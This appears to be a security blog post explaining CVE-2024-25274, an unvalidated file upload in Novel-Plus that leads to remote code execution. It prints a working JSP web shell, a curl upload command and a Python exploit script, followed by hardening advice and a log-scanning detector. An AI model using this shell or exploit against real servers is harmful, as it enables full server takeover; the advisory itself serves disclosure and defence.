CVE-2024-25274 - Exploiting Arbitrary File Upload in Novel-Plus v4.3.-RC1 for Remote Code Execution

In early 2024, a serious security flaw was discovered in the popular open-source platform Novel-Plus version v4.3.-RC1. This vulnerability, assigned CVE-2024-25274, allows an attacker to upload arbitrary files through the application's /sysFile/upload endpoint. If exploited, an attacker can achieve remote code execution on the server, putting sensitive data and server integrity at risk. In this article, we’ll break down what the vulnerability is, how it can be exploited, and what you can do to stay safe.

What Is Novel-Plus?

Novel-Plus is a modern, open-source online novel platform written in Java. It's widely used for managing private libraries of web novels, supporting authors and readers alike.

- Vulnerability ID: CVE-2024-25274
- Affected component: /sysFile/upload

How Does the Vulnerability Work?

The /sysFile/upload endpoint in Novel-Plus is designed to let users, admins, or other processes upload files (such as images or documents). However, in v4.3.-RC1, there is missing or improper validation of the type and content of uploaded files. As a result, attackers can upload files with dangerous code inside – like a web shell or a malicious script.

Once the file is uploaded, if it is placed in a web-accessible location and executed by the server, the attacker can run any commands on the server, effectively taking over the system.

1. Uploading a Malicious File

Suppose an attacker wants to gain command-line access to the server. They craft a simple web shell (for example, a .jsp file):

webshell.jsp

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    int a = -1;
    while((a=in.read())!=-1)
        out.print((char)a);
}
%>

This web shell lets an attacker run system commands by accessing:
http://<target-site>/<upload-path>/webshell.jsp?cmd=whoami

2. Uploading via /sysFile/upload

Using a tool like curl or Burp Suite, the attacker sends a POST request:

curl -F "file=@webshell.jsp" http://target-site/sysFile/upload

If successful, the server returns a URL to the uploaded file, for example:
http://target-site/upload/2024/06/18/webshell.jsp

3. Gaining Remote Code Execution

Now, the attacker navigates to:
http://target-site/upload/2024/06/18/webshell.jsp?cmd=whoami

This triggers the server to execute the command whoami, returning the current user. The attacker can run any shell command this way, giving them full control over the server.

Python PoC for CVE-2024-25274

import requests

url = "http://target-site/sysFile/upload"
# Open the file in a context manager so the handle is closed after the request
with open('webshell.jsp', 'rb') as f:
    files = {'file': ('webshell.jsp', f, 'application/octet-stream')}
    response = requests.post(url, files=files)

# Extract uploaded file path from response (may need adjustment)
uploaded_path = response.json().get('url')
print(f"Shell uploaded to: {uploaded_path}")

# Execute command through web shell
cmd_url = f"{uploaded_path}?cmd=whoami"
r = requests.get(cmd_url)
print("Command output:", r.text)

How to Protect Your Server

1. Patch as soon as possible:
Check the official Novel-Plus repository for updates or patches. Upgrade to a non-vulnerable version as soon as it becomes available.

2. Harden file upload:
Validate the type and content of uploaded files (the check that is missing in v4.3.-RC1), do not serve uploaded files from a location where the server will execute them, and apply the principle of least privilege to the upload controller.

3. Monitor logs:
Watch your server logs for suspicious uploads or access to uploaded files.
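As an added example (not code from the original post or from the Novel-Plus project), the following script turns the "monitor logs" advice into a concrete check: it scans web-server access logs for the pattern described in the walkthrough above, a POST to /sysFile/upload followed by a request for a .jsp file under the upload directory, optionally with a cmd parameter. It assumes combined log format and that uploads are served under /upload/, as in the example URL earlier; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2024:10:01:02 +0000] "POST /sysFile/upload HTTP/1.1" 200 312 "-" "curl/8.4.0"
10.0.0.5 - - [18/Jun/2024:10:01:09 +0000] "GET /upload/2024/06/18/webshell.jsp?cmd=whoami HTTP/1.1" 200 41 "-" "curl/8.4.0"
10.0.0.9 - - [18/Jun/2024:10:02:30 +0000] "GET /upload/2024/06/18/cover.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Jun/2024:10:03:00 +0000] "GET /upload/2023/01/02/old.jspx HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/sysfile/upload"       # endpoint named in the advisory (paths are compared lower-case)
UPLOAD_DIR = "/upload/"                   # directory the upload response points at (assumed layout)
SCRIPT_EXTS = (".jsp", ".jspx", ".jspf")  # server-side script types that should never live there

def parse_line(line):  # one combined-format line -> dict, or None if it does not match
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path.lower()
    entry["query"] = parse_qs(parts.query)
    return entry

def scan(log_text):  # -> list of (ip, timestamp, path, tags) for web-shell-like requests
    uploaders, alerts = set(), []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT:
            uploaders.add(e["ip"])  # remember which clients used the upload endpoint
            continue
        if not (e["path"].startswith(UPLOAD_DIR) and e["path"].endswith(SCRIPT_EXTS)):
            continue
        tags = ["script-in-upload-dir"]
        if "cmd" in e["query"]:
            tags.append("webshell-command")      # the parameter the PoC shell reads
        if e["ip"] in uploaders:
            tags.append("same-client-uploaded")  # upload followed by an execution attempt
        if e["status"] == "200":
            tags.append("served-200")            # the server actually answered the request
        alerts.append((e["ip"], e["ts"], e["path"], tags))
    return alerts

if __name__ == "__main__":
    for ip, ts, path, tags in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {path} -> {', '.join(tags)}")
```

Point scan() at your real access log to triage; a hit tagged same-client-uploaded and served-200 is the strongest signal and warrants inspecting the upload directory for the file itself.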

Conclusion

CVE-2024-25274 is a dangerous zero-day vulnerability in Novel-Plus v4.3.-RC1 that allows attackers to upload and execute arbitrary code on servers. This simple exploit can lead to a complete server takeover if not mitigated. If you run Novel-Plus, update immediately, review your file upload security, and monitor your logs!

If you found this post helpful, consider sharing it with your team or security community. Stay safe!

*Disclaimer: This post is for educational and defensive security purposes only. Unauthorized exploitation is illegal.*

Timeline

Published on: 02/20/2024 16:15:10 UTC
Last modified on: 08/29/2024 20:36:19 UTC